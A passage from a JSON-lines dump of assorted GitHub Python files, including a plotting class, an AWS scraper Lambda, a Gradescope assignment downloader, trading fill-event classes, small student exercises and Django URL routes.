'median': [], 'labels': []}\n\n new_result_dict[approx_type]['median'].append(data_dict[freq_gov][approx_type]['median'])\n\n new_result_dict[approx_type]['min'].append(data_dict[freq_gov][approx_type]['median'] -\n data_dict[freq_gov][approx_type]['min'])\n\n new_result_dict[approx_type]['max'].append(data_dict[freq_gov][approx_type]['max'] -\n data_dict[freq_gov][approx_type]['median'])\n\n new_result_dict[approx_type]['labels'].append(\n f\"{self.major_formatter_x(new_result_dict[approx_type]['median'][-1])} \\n-\"\n 
f\"{self.major_formatter_x(new_result_dict[approx_type]['min'][-1])} \\n+\"\n f\"{self.major_formatter_x(new_result_dict[approx_type]['max'][-1])}\")\n return new_result_dict\n\n def _change_gov_names(self, gov_names):\n user_gov_names = {'spsa2tmpn': 'spsa2_1_solid', 'spsa2_logic': 'spsa2_1_highFreq',\n 'spsa2long': 'spsa2_3', 'spsa2lcls': 'spsa2_2',\n 'spsa2_test': 'spsa2_1_EAS', 'spsa2_dina': 'spsa2_1_dynamic'}\n\n new_gov_names = []\n\n for gov_name in gov_names:\n if len(gov_name.split('-')) == 1:\n if gov_name in user_gov_names.keys():\n new_gov_names.append(user_gov_names[gov_name])\n else:\n new_gov_names.append(gov_name)\n else:\n tuners = {'c_0': {}, 'c_1': {}}\n temp_name = user_gov_names[gov_name.split('-')[0]] + '\\n'\n gov_name = gov_name[len(gov_name.split('-')[0]) + 1:]\n\n # get tuners\n params = [['alpha', 'b'], ['beta', 't'], ['load', 'zzz']]\n for tun_name, symbol in params:\n curr_tuners = gov_name.split(symbol)[0]\n gov_name = gov_name[len(curr_tuners):]\n\n if len(curr_tuners.split('-')) == 1:\n tuners['c_0'][tun_name] = curr_tuners[1:]\n tuners['c_1'][tun_name] = curr_tuners[1:]\n else:\n curr_tuners = curr_tuners[1:]\n tuners['c_0'][tun_name] = curr_tuners.split('-')[0]\n tuners['c_1'][tun_name] = curr_tuners.split('-')[1]\n\n # create tuners string\n temp_name = temp_name + f\"c_0: a - {tuners['c_0']['alpha']}, \" \\\n f\"b - {tuners['c_0']['beta']}, \" \\\n f\"load - {tuners['c_0']['load']}\\n\" \\\n f\"c_1: a - {tuners['c_1']['alpha']}, \" \\\n f\"b - {tuners['c_1']['beta']}, \" \\\n f\"load - {tuners['c_1']['load']}\"\n\n new_gov_names.append(temp_name)\n\n return new_gov_names\n\n def make_plot(self, test_name, results_all, header, save_path, image_name,\n save_img=True, need_white_back=True, show_plot=True):\n\n gov_names = list(results_all.keys())\n\n approx_data = self.get_approx_data(results_all, test_name, self.power_consts)\n stats_data = self.get_stats_data(approx_data)\n plot_ready_data = self.restruct_data_for_plot(stats_data, gov_names)\n\n matplotlib.rcParams['figure.figsize'] = [16, 9]\n matplotlib.rcParams['figure.figsize'] = [25, 9]\n matplotlib.rcParams['figure.figsize'] = self.fig_size\n\n if need_white_back:\n matplotlib.rcParams['axes.facecolor'] = 'white'\n matplotlib.rcParams['savefig.facecolor'] = 'white'\n\n fig, ax = plt.subplots()\n\n width = 0.9 # the width of the bars\n\n x_pos = np.arange(0, 3 * len(gov_names), 3)\n # x_pos = np.arange(0, 9, 2)\n\n print(f'TITLE {header}, median')\n str_out = ''\n for item in plot_ready_data['solid_freq']['median']:\n str_out = str_out + str(item) + '\\t'\n print(str_out)\n\n bar_freq_only = ax.bar(x_pos, plot_ready_data['solid_freq']['median'], width,\n yerr=[plot_ready_data['solid_freq']['min'], plot_ready_data['solid_freq']['max']],\n align='center', alpha=0.5, ecolor='gray', capsize=10)\n\n bar_min_freq = ax.bar(x_pos + width, plot_ready_data['min_freq_idle']['median'], width,\n yerr=[plot_ready_data['min_freq_idle']['min'], plot_ready_data['min_freq_idle']['max']],\n align='center', alpha=0.5, ecolor='gray', capsize=10)\n\n bar_precent = ax.bar(x_pos + 2 * width, plot_ready_data['freq_precent']['median'], width,\n yerr=[plot_ready_data['freq_precent']['min'], plot_ready_data['freq_precent']['max']],\n align='center', alpha=0.5, ecolor='gray', capsize=10)\n\n ax.set_ylabel('power consumption in mAh')\n\n ax.set_xticks([pos + width for pos in x_pos])\n\n # names pretty print\n x_labels = self._change_gov_names(gov_names)\n ##\n # ax.set_xticklabels(gov_names)\n ax.set_xticklabels(x_labels)\n\n 
ax.set_title(header)\n ax.yaxis.grid(True)\n\n ax.bar_label(bar_freq_only, labels=plot_ready_data['solid_freq']['labels'], label_type='edge')\n ax.bar_label(bar_min_freq, labels=plot_ready_data['min_freq_idle']['labels'], label_type='edge')\n ax.bar_label(bar_precent, labels=plot_ready_data['freq_precent']['labels'], label_type='edge')\n\n ax.legend((bar_freq_only[0], bar_min_freq[0], bar_precent[0]), ('freq_only', 'min_freq-idle', 'precent-idle'),\n loc='lower left', bbox_to_anchor=(0, 1.02, 1, 0.2),\n fancybox=True, shadow=True, ncol=5)\n\n ax.yaxis.set_major_formatter(major_formatter_y)\n # ax.ticklabel_format(style='plain', axis='y')\n min_y, max_y = ax.get_ylim()\n ax.set_ylim(min_y, max_y * 1.1)\n ax.set_xlim(0 - width, x_pos[-1] + 1.7 + width)\n\n plt.xticks(rotation=self.rotation)\n plt.tight_layout()\n\n if save_img:\n img_path = os.path.join(save_path, image_name)\n plt.savefig(img_path)\n print(f'image writen on disk: {img_path}.png')\n\n if show_plot:\n plt.show()\n\n\nif __name__ == \"__main__\":\n import config\n from testing_core.modules_loader import ModulesLoader\n\n loader = ModulesLoader()\n loader.load_tests()\n test_names = list(loader.get_tests_dict().keys())\n\n plotter = StatsPlotter(config.power_consts, config.clusters, 1.96, True, [25, 9], 45)\n\n dict_test_number = {}\n for test_name in test_names:\n dict_test_number[test_name] = len(os.listdir(os.path.join(config.path_plotter_results, test_name)))\n\n results_all = plotter.get_results_dict(config.freq_governors_plot, test_names,\n dict_test_number, config.path_plotter_results)\n plotter.make_plot('videoVLC', results_all,\n 'videoVLC power consumption',\n config.path_plot_img_results, 'videoVLC',\n show_plot=False)\n","repo_name":"makar-pelogeiko/freq_gov_test","sub_path":"testing_core/stats_plotter.py","file_name":"stats_plotter.py","file_ext":"py","file_size_in_byte":20182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"32717997599","text":"try:\n import unzip_requirements\nexcept ImportError:\n pass\n\nimport json\nimport logging\nfrom random import sample\nimport boto3\n\n# serverless requires first import style, pytest requires second\ntry:\n from src.lambda_gather.utils import (\n get_lifeprint_dictionary_links,\n get_new_youtube_links_from_dictionary_content_page,\n lifeprint_dictionary_to_dynamodb,\n load_creds_env_gather,\n verify,\n dynamodb_scan,\n update_dynamodb_item,\n get_lesson_page_videos,\n )\n\n EXTERNAL_RESOURCES_FILEPATH = \"resources/external-resources.json\"\nexcept:\n from gather.src.lambda_gather.utils import (\n get_lifeprint_dictionary_links,\n get_new_youtube_links_from_dictionary_content_page,\n lifeprint_dictionary_to_dynamodb,\n load_creds_env_gather,\n verify,\n dynamodb_scan,\n update_dynamodb_item,\n get_lesson_page_videos,\n )\n\n EXTERNAL_RESOURCES_FILEPATH = \"gather/resources/external-resources.json\" # assuming tests run from the root of the project\n\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef lambda_gather(event, context):\n dynamodb_table_name = \"asl_resource_dict\"\n creds = load_creds_env_gather()\n dynamodb_client = boto3.client(\n \"dynamodb\", region_name=creds[\"AWS_REGION\"], verify=verify()\n )\n dynamodb_resource = boto3.resource(\n \"dynamodb\", region_name=creds[\"AWS_REGION\"], verify=verify()\n )\n\n # Lifeprint\n letters = sample(\"abcdefghijklmnopqrstuvwxyz\", 3)\n all_dictionary_pages = get_lifeprint_dictionary_links(\n sleep_time=0.01, letters=letters\n )\n lessons 
= sample(\n [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\"]\n + [str(num) for num in list(range(11, 60))],\n 5,\n )\n saved_entries = dynamodb_scan(dynamodb_resource, dynamodb_table_name)\n existing_urls = [entry[\"url\"] for entry in saved_entries]\n\n for dictionary_word, url in all_dictionary_pages.items():\n try:\n new_entries = get_new_youtube_links_from_dictionary_content_page(\n url, dictionary_word, existing_urls\n )\n if new_entries:\n lifeprint_dictionary_to_dynamodb(\n new_entries, dynamodb_table_name, dynamodb_client\n )\n except Exception as e:\n logger.info(\n \"Error in getting YouTube links for\" + dictionary_word + \": \" + str(e)\n )\n\n for lesson_number in lessons:\n try:\n new_entries = get_lesson_page_videos(lesson_number, existing_urls)\n if new_entries:\n lifeprint_dictionary_to_dynamodb(\n new_entries, dynamodb_table_name, dynamodb_client\n )\n except Exception as e:\n logger.info(\n \"Error in getting lesson page videos for Lesson #\"\n + lesson_number\n + \": \"\n + str(e)\n )\n\n external_resources = json.load(open(EXTERNAL_RESOURCES_FILEPATH))\n for entry in external_resources:\n if entry[\"url\"] not in existing_urls:\n update_dynamodb_item(\n url=entry[\"url\"],\n description=entry[\"description\"],\n contentSource=entry.get(\"contentSource\", \"\"),\n contentCreator=entry.get(\"contentCreator\", \"\"),\n contentType=entry.get(\"contentType\", \"\"),\n dynamodb_client=dynamodb_client,\n table_name=dynamodb_table_name,\n )\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(\"ASL content dictionary successfully updated\"),\n }\n","repo_name":"paytonjjones/learn-asl-bot","sub_path":"gather/src/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21473420912","text":"for i in range(2,100):\n ir=int(sumaDivisor(1))\n for j in range(i,100):\n rj= int(sumaDivisor(j))\n if ((ir==j) and (rj==i)):\n print(str(i) + \"\\t es numero amigo\")\n\n#Esto se debe de pegar en ciclos.\n\n\n \n\n\n\n","repo_name":"KerlyNieto5/kerlynieto5","sub_path":"ejemplos en clase.py/numero amigos.py","file_name":"numero amigos.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3061995754","text":"#!/usr/bin/env python3\nimport sys\nfrom PyQt5.QtWidgets import QMenu, QAction, QWidget, QHBoxLayout, QTabWidget\nfrom propertyWidget import PropertyWidget\nfrom customPropWidget import CustomPropWidget\nfrom PyQt5.QtCore import pyqtSignal, Qt\nfrom functools import partial\n\nclass Main_widget(QWidget):\n\tdef __init__(self, properties, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.mainLayout = QHBoxLayout(self)\n\t\tself.propertiesWidget = None\n\t\tself.scroll = None\n\t\tself.properties = properties\n\t\tself.createProperties()\n\t\t# self.mainLayout.addWidget(self.propertiesWidget)\n\t\tself.createCustomAdd()\n\t\tself.tabs = QTabWidget()\n\t\tself.tabs.addTab(self.propertiesWidget, \"Property Analysis\")\n\t\tself.tabs.addTab(self.customWidget, \"Try Other Address\")\n\t\tself.mainLayout.addWidget(self.tabs)\n\n\n\tdef createProperties(self):\n\t\tself.propertiesWidget = PropertyWidget(self.properties)\n\t\tself.propertiesWidget.createPropWidgets()\n\t\t# self.scroll.setWidget(self.propertiesWidget)\n\n\tdef createCustomAdd(self):\n\t\tself.customWidget = 
CustomPropWidget()\n\t\tself.customWidget.submitButton.clicked.connect(\n\t\t\tpartial(self.customWidget.createPlot, self.customWidget.streetAdEdit, self.customWidget.cityEdit, self.customWidget.stateEdit, self.customWidget.zipcodeEdit,\n\t\t\t\t\tself.customWidget.aliasEdit))\n\n\n\n\n","repo_name":"jotk/GHAR","sub_path":"GUI/main_widget.py","file_name":"main_widget.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3313925109","text":"import pandas as pd\n\nfrom pandas import Timestamp\nfrom abc import abstractmethod\nfrom bson import ObjectId\n\nfrom pcm_backtest.conf import EXCHANGE_DICT, FILL, FILL_DICT\nfrom .core import Event\n\n\n\nclass FillEvent(Event):\n\t\"\"\"\n\tEncapuslate the notion of a Filled Order, as returned\n\tfrom a brokage. Stores the quantity and filled price of an instructment.\n\tIn addition, stores the commission of the trade from the brokage\n\t\"\"\"\n\t__slots__ = [\n\t\t'symbol', 'exchange', 'quantity',\n\t\t'fill_type', 'fill_cost', 'commission', 'id', 'order_id'\n\t]\n\ttype = FILL\n\n\tdef __init__(\n\t\tself, order_id,\n\t\tsymbol, exchange, quantity, fill_type, fill_cost,\n\t\tcommission=None, id=None\n\t):\n\t\t\"\"\"\n\t\tInitialize the FillEvent object.\n\n\t\tParameter\n\t\t---------\n\t\tsymbol: The instrucment which was filled\n\t\ttimestamp: The bar-resoultion when the order was filled\n\t\texchange: The exchange where the order was filled\n\t\tquantity: The filled quantity\n\t\tfill_type: The direction of fill ('BUY' or 'SELL')\n\t\tfill_cost: The holdings value per unit of security\n\t\tcommission: An optional commission\n\t\t\"\"\"\n\t\tself.order_id = order_id\n\t\tself.id = ObjectId() if id is None else id\n\t\tself.symbol = symbol\n\t\tself.exchange = exchange\n\t\tself.quantity = int(quantity)\n\t\tself.fill_type = fill_type\n\t\tself.fill_cost = fill_cost\n\n\t\t# Calculate commission\n\t\tif commission:\n\t\t\tself.commission = commission\n\t\telse:\n\t\t\tself.commission = self.calculate_commission()\n\n\n\tdef __lt__(self, other):\n\t\treturn not self.id < other.id\n\n\n\tdef __eq__(self, other):\n\t\treturn self.id == other.id\n\n\n\tdef __repr__(self):\n\t\treturn (\n\t\t\t'Fill: timestamp=%s, Symbol=%s, Exchange=%s, ' +\n\t\t\t'Quantity=%s, Fill Type=%s, ' +\n\t\t\t'Fill Cost=%s, Commission=%s' \n\t\t) % ( \n\t\t\tself.timestamp, self.symbol, self.exchange.value,\n\t\t\tself.quantity, self.fill_type.__name__,\n\t\t\tself.fill_cost, self.commission\n\t\t)\n\n\n\t@property\n\tdef timestamp(self):\n\t\treturn pd.Timestamp(self.id.generation_time)\n\n\n\t@abstractmethod\n\tdef calculate_commission(self):\n\t\traise NotImplementedError('Commission bases on different broker')\n\n\n\nclass FillEventIB(FillEvent):\n\tdef calculate_commission(self):\n\t\t\"\"\"\n\t\tCalculate the fees of trading based on Interactive Brokers\n\t\tBroker fee structure for API, in USD\n\n\t\tNotes\n\t\t-----\n\t\t- This does not include exchange or ECN fees\n\n\t\tReference\n\t\t---------\n\t\tBased on \"US API Directed Orders\":\n\t\thttps://www.interactivebrokers.com/en/index.php?f=commission&p=stocks2\n\t\t\"\"\"\n\t\tmin_cost = 1 # have it here, but I decide not to implement to on scale\n\t\tmax_cost = 0.005*self.fill_cost*self.quantity\n\t\tfull_cost = 0.005 * self.quantity\n\t\t\n\t\treturn min(full_cost, max_cost)\n\n\n\tdef as_dict(self):\n\t\treturn {\n\t\t\t'event_type': 'fill_ib',\n\t\t\t'data': {\n\t\t\t\t'id': str(self.id),\n\t\t\t\t'order_id': 
str(self.order_id),\n\t\t\t\t'symbol': self.symbol,\n\t\t\t\t'exchange': self.exchange.value[0].upper(),\n\t\t\t\t'quantity': self.quantity,\n\t\t\t\t'fill_type': self.fill_type.value,\n\t\t\t\t'fill_cost': self.fill_cost,\n\t\t\t\t'commission': self.commission,\n\t\t\t}\n\t\t}\n\t\n\t\n\t@classmethod\n\tdef from_dict(cls, **kws):\n\t\treturn cls(\n\t\t\tid=ObjectId(kws.get('id')),\n\t\t\torder_id=ObjectId(kws.get('order_id')),\n\t\t\tsymbol=kws.get('symbol'),\n\t\t\texchange=EXCHANGE_DICT[kws.get('exchange')],\n\t\t\tquantity=int(kws.get('quantity')),\n\t\t\tfill_type=FILL_DICT[kws.get('fill_type')],\n\t\t\tfill_cost=kws.get('fill_cost'),\n\t\t\tcommission=kws.get('commission'),\n\t\t)\n","repo_name":"webclinic017/pcm_backtest","sub_path":"event/fill.py","file_name":"fill.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19882579120","text":"# matrix = [\r\n# [1, 2, 3],\r\n# [4, 5, 6],\r\n# [7, 8, 9]\r\n# ]\r\n#\r\n# for row in matrix:\r\n# for item in row:\r\n# print(item)\r\n\r\n# My answer\r\n# numbers = [5, 2, 1, 7, 4, 6, 8, 232, 67, 89, 69, 69, 4, 2, 6]\r\n# uniques = []\r\n# numbers.sort()\r\n# temp = numbers[0]\r\n# print(numbers)\r\n# for number in numbers:\r\n# if number != temp:\r\n# uniques.append(temp)\r\n# temp = number\r\n# print(uniques)\r\n\r\n# Correct Answer\r\nnumbers = [5, 2, 1, 7, 4, 6, 8, 232, 67, 89, 69, 69, 4, 2, 6]\r\nuniques = []\r\nfor number in numbers:\r\n if number not in uniques:\r\n uniques.append(number)\r\nprint(uniques)\r\n","repo_name":"Poyx15/Tutorials","sub_path":"Codecademy Practice/Python Syntax and Algorithm/2DLists.py","file_name":"2DLists.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6948943536","text":"n = int(input())\ngraph = [list(map(int, input().split())) for _ in range(n)]\ndp = [[[0,0,0]]*(n+1) for _ in range(n+1)] # 가로, 세로, 대각선\ndp[1][1] = [0,0,0]\ndp[1][2] = [1,0,0]\nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 1:\n dp[i+1][j+1] = [-1,0,0]\n\nsig = 0\nfor i in range(n): # 세로\n for j in range(n): # 가로\n if dp[i+1][j+1][0] == -1:\n continue\n if i == 0 and j == 1:\n continue \n\n if dp[i][j+1][0] == -1:\n sig = 1 # 위에가 막힘\n elif dp[i+1][j][0] == -1:\n sig = 2 # 왼쪽이 막힘\n elif dp[i][j][0] == -1:\n sig = 3 # 왼쪽대각 막힘\n else:\n sig = 0\n\n if sig == 1:\n dp[i+1][j+1] = [dp[i+1][j][0] + dp[i+1][j][2], 0, 0]\n elif sig == 2:\n dp[i+1][j+1] = [0,dp[i][j+1][1] + dp[i][j+1][2], 0]\n elif sig == 3:\n dp[i+1][j+1] = [dp[i+1][j][0] + dp[i+1][j][2], dp[i][j+1][1] + dp[i][j+1][2], 0]\n else:\n dp[i+1][j+1] = [dp[i+1][j][0] + dp[i+1][j][2], dp[i][j+1][1] + dp[i][j+1][2], sum(dp[i][j])]\n\n\nx = sum(dp[n][n])\nif x == -1:\n print(0)\nelse:\n print(x)\n\n# dfs 풀이\n\n# import sys\n# import copy\n# input = sys.stdin.readline\n# n = int(input())\n# graph = [list(map(int, input().split())) for _ in range(n)]\n# graph[0][0], graph[0][1] = 1,1\n# dx = [0,1,1]\n# dy = [1,0,1]\n# cnt = 0\n# def dfs(x,y, graph, state):\n# global cnt\n# if x == n-1 and y == n-1:\n# cnt += 1\n# return\n# for i in range(3):\n# if state == 'garo' and i == 1:\n# continue\n# if state == 'sero' and i == 0:\n# continue\n# new_graph = copy.deepcopy(graph)\n# nx = x + dx[i]\n# ny = y + dy[i]\n# if nx < n and ny < n:\n# if i == 2:\n# if graph[nx][ny] == 0 and graph[nx-1][ny] == 0 and graph[nx][ny-1] == 0:\n# new_graph[nx][ny] = 1\n# dfs(nx,ny, new_graph, 'degak')\n# 
else:\n# if graph[nx][ny] == 0:\n# new_graph[nx][ny] = 1\n# if i == 0:\n# dfs(nx,ny,new_graph, 'garo')\n# else:\n# dfs(nx,ny,new_graph, 'sero')\n\n# dfs(0,1, graph, 'garo')\n# print(cnt)\n\n","repo_name":"gyoseon123/baekjoon","sub_path":"python/17070.py","file_name":"17070.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1197470677","text":"import inquirer\nimport json\nimport httpx\nimport os\nimport bs4\nimport sys\nimport time\nimport pathvalidate\nfrom tqdm import tqdm\nfrom modules import getcourses\n\ndef massdownload():\n if os.path.exists(\"./jsons/cookies.json\"):\n with open('./jsons/config.json') as f:\n config = json.load(f)\n with open('./jsons/cookies.json') as f:\n cookies = json.load(f)\n if not os.path.exists(\"./downloads\"):\n os.mkdir(\"./downloads\")\n\n transport = httpx.HTTPTransport(retries=3) #high retry amount due to fickle nature of mass pdf downloading\n client = httpx.Client(cookies=cookies, headers={\"User-Agent\": config[\"User-Agent\"]}, transport=transport)\n\n courses = getcourses.getcourses()\n downloadList = []\n\n if len(courses) > 0:\n for item in courses:\n downloadList.append((item[1], item[0]))\n\n downloadQuestion = [\n inquirer.Checkbox(\n \"courses\",\n message=\"What courses do you want to archive?\",\n choices=downloadList,\n ),\n ]\n\n downloadAnswer = inquirer.prompt(downloadQuestion)\n if len(downloadAnswer) > 0:\n for course in downloadAnswer[\"courses\"]:\n url = \"https://www.gradescope.com/courses/\" + str(course)\n try:\n coursePage = client.get(url)\n cookies[\"_gradescope_session\"] = coursePage.cookies[\"_gradescope_session\"]\n except:\n print(\"Network error! Please try again later.\")\n sys.exit(1)\n if coursePage.status_code != 200:\n print(\"Account details are incorrect. 
Try deleting cookies.json and rerunning setup.py\")\n sys.exit(1)\n\n courseSoup = bs4.BeautifulSoup(coursePage.text, features=\"html.parser\")\n courseName = pathvalidate.sanitize_filepath(courseSoup.find(\"h1\", {\"class\": \"courseHeader--title\"}).text)\n assignmentLister = courseSoup.find(\"table\", {\"id\": \"assignments-student-table\"})\n assignmentList = assignmentLister.find(\"tbody\").findChildren(\"tr\")\n\n if len(assignmentList) > 0:\n print(courseName + \": (trying to download \" + str(len(assignmentList)) + \" assignments):\\n\")\n for item in assignmentList:\n linkSection = item.find(\"th\", {\"class\": \"table--primaryLink\"})\n if linkSection.find(\"a\"):\n downloadLink = \"https://www.gradescope.com\" + linkSection.find(\"a\")[\"href\"] + \".pdf\"\n fileName = downloadLink.split(\"/\")[-1]\n with client.stream(\"GET\", downloadLink, timeout=15) as r: #high timeout needed because gradescope doesn't prioritize file downloads!\n\n if not os.path.exists(\"./downloads/\" + courseName):\n os.mkdir(\"./downloads/\" + courseName)\n\n with open(\"./downloads/\" + courseName + \"/\" + fileName, \"wb\") as f:\n with tqdm(unit_scale=True, unit_divisor=1024, unit=\"B\", desc=fileName) as progress:\n num_bytes_downloaded = r.num_bytes_downloaded\n for data in r.iter_bytes():\n f.write(data)\n progress.update(r.num_bytes_downloaded - num_bytes_downloaded)\n num_bytes_downloaded = r.num_bytes_downloaded\n time.sleep(1) #high sleep value to not overload gradescope servers\n else:\n print(\"Could not find assignments to download.\")\n sys.exit(1)\n\n else:\n return(0) #user did not choose class, kick them out to main menu\n else:\n print(\"You don't have any Gradescope courses. Please add a course before using this script\")\n sys.exit(1)\n\n else:\n print(\"Cookies not saved. 
Please (re)run setup.py.\")\n sys.exit(1)","repo_name":"evilsaloon/Gradescope-Tools","sub_path":"modules/massdownload.py","file_name":"massdownload.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21534134387","text":"#make sure that you do the following command first if you haven't\n#pip3 install requests\n\n\nimport requests\n\ndef get_random_magic_card():\n # Define the Scryfall API URL for a random card\n scryfall_url = \"https://api.scryfall.com/cards/random\"\n\n # Send a GET request to the API\n response = requests.get(scryfall_url)\n\n # Check if the request was successful (status code 200)\n if response.status_code == 200:\n # Parse the JSON response\n card_data = response.json()\n\n # Extract and print relevant information about the card\n card_name = card_data[\"name\"]\n card_set = card_data[\"set_name\"]\n\n print(f\"Card Name: {card_name}\")\n print(f\"Set Name: {card_set}\")\n else:\n print(f\"Error: {response.status_code} - {response.text}\")\n\ndef get_magic_search():\n scryfall_url = \"https://api.scryfall.com/cards/search?q=t%3Acreature\"\n response = requests.get(scryfall_url)\n if response.status_code == 200:\n card_data = response.json()\n print(card_data[\"total_cards\"])\n else:\n print(f\"Error: {response.status_code} - {response.text}\")\n\n\n\nif __name__ == \"__main__\":\n get_random_magic_card()\n get_magic_search()\n","repo_name":"nzoam93/api-calls","sub_path":"python/scryfall-api-call.py","file_name":"scryfall-api-call.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6343604768","text":"\n#%% Some function decorators for deprecation\nimport warnings\nimport functools\n\nimport functools\nimport inspect\nimport warnings\n\nstring_types = (type(b''), type(u''))\n\ndef deprecated(reason):\n \"\"\"\n @brief decorator for deprecating old functions \n @cite laurent laporte https://stackoverflow.com/questions/2536307/decorators-in-the-python-standard-lib-deprecated-specifically \n @param[in] reason - why its deprecated and what to do \n \"\"\"\n if isinstance(reason, string_types):\n\n # The @deprecated is used with a 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated(\"please, use another function\")\n # def old_function(x, y):\n # pass\n def decorator(func1):\n if inspect.isclass(func1):\n fmt1 = \"Call to deprecated class {name} ({reason}).\"\n else:\n fmt1 = \"Call to deprecated function {name} ({reason}).\"\n @functools.wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt1.format(name=func1.__name__, reason=reason),\n category=DeprecationWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func1(*args, **kwargs)\n return new_func1\n return decorator\n\n elif inspect.isclass(reason) or inspect.isfunction(reason):\n # The @deprecated is used without any 'reason'.\n #\n # .. 
code-block:: python\n #\n # @deprecated\n # def old_function(x, y):\n # pass\n func2 = reason\n if inspect.isclass(func2):\n fmt2 = \"Call to deprecated class {name}.\"\n else:\n fmt2 = \"Call to deprecated function {name}.\"\n @functools.wraps(func2)\n def new_func2(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt2.format(name=func2.__name__),\n category=DeprecationWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func2(*args, **kwargs) \n return new_func2\n\n else:\n raise TypeError(repr(type(reason)))\n\n\n#incomplete functino decorator\ndef incomplete(reason):\n \"\"\"\n @brief decorator for incomplete functions \n @param[in] reason - reason that its incomplete. Unlike deprecation this REQUIRES a reason \n \"\"\"\n def decorator(func1):\n if inspect.isclass(func1):\n fmt1 = \"Call to incomplete class {name} ({reason}).\"\n else:\n fmt1 = \"Call to incomplete function {name} ({reason}).\"\n @functools.wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', UserWarning)\n warnings.warn(\n fmt1.format(name=func1.__name__, reason=reason),\n category=UserWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', UserWarning)\n return func1(*args, **kwargs)\n return new_func1\n return decorator\n","repo_name":"Sheekaboom/WeissTools","sub_path":"WeissTools/generic/code_states.py","file_name":"code_states.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72280746372","text":"\"\"\"\r\nExercise 7\r\nTwo words are anagrams if you can rearrange the letters from one to\r\nspell the other. Write a function called is_anagram that takes two\r\nstrings and returns True if they are anagrams.\r\n\"\"\"\r\n\r\n\r\ndef count_freq(slowo):\r\n slownik = dict()\r\n for x in slowo:\r\n if x not in slownik:\r\n slownik[x] = 1\r\n else:\r\n slownik[x] = slownik[x] + 1\r\n return slownik\r\n\r\n\r\ndef is_anagram(a, b):\r\n if count_freq(a) == count_freq(b):\r\n return True\r\n return False\r\n\r\n\r\nprint(is_anagram(\"kajak\", \"ajkak\"))\r\n","repo_name":"djeada/Think-Python","sub_path":"src/Chapter10/Exercise7.py","file_name":"Exercise7.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"6732605671","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Lexers, parsers, compilers, etc for OpenFisca source code\"\"\"\n\nfrom setuptools import setup, find_packages\n\n\nclassifiers = \"\"\"\\\nDevelopment Status :: 2 - Pre-Alpha\nLicense :: OSI Approved :: GNU Affero General Public License v3\nOperating System :: POSIX\nProgramming Language :: Python\nTopic :: Scientific/Engineering :: Information Analysis\n\"\"\"\n\ndoc_lines = __doc__.split('\\n')\n\n\nsetup(\n name = 'OpenFisca-Parsers',\n version = '1.0.2',\n author = 'OpenFisca Team',\n author_email = 'contact@openfisca.fr',\n classifiers = [classifier for classifier in classifiers.split('\\n') if classifier],\n description = doc_lines[0],\n keywords = 'benefit compiler lexer microsimulation parser social tax',\n license = 'http://www.fsf.org/licensing/licenses/agpl-3.0.html',\n long_description = '\\n'.join(doc_lines[2:]),\n url = 'https://github.com/openfisca/openfisca-parsers',\n\n install_requires = [\n 'Biryani[datetimeconv] >= 0.10.1',\n 'numpy >= 1.11',\n ],\n packages = find_packages(),\n )\n","repo_name":"openfisca/openfisca-parsers","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"41357053646","text":"from django.urls import include, path\nfrom rest_framework import permissions\n\nfrom .views import CompanyListApiView,CreateConnecttoCompanyView,CompanyapplicationApiView,CompanyapplicationEditView,CompanyProfileView,ListActivityOppScholarViewSet\nfrom .views import ListAllActivityOppScholarViewSet, ListUserActivityOppScholarViewSet\n\nurlpatterns = [\n # urls to send a application to be a company, connect to the company and company profile\n path(\"Company-users\",CompanyListApiView.as_view(),name=\"Company-users\"),\n path('SendRequestToCompany',CreateConnecttoCompanyView.as_view(),name='send_company_request'),\n path(\"Companyapplication\",CompanyapplicationApiView.as_view(),name=\"Companyapplication\"),\n path(\"Companyapplicationedit/\",CompanyapplicationEditView.as_view(),name=\"Companyapplicationedit\"),\n 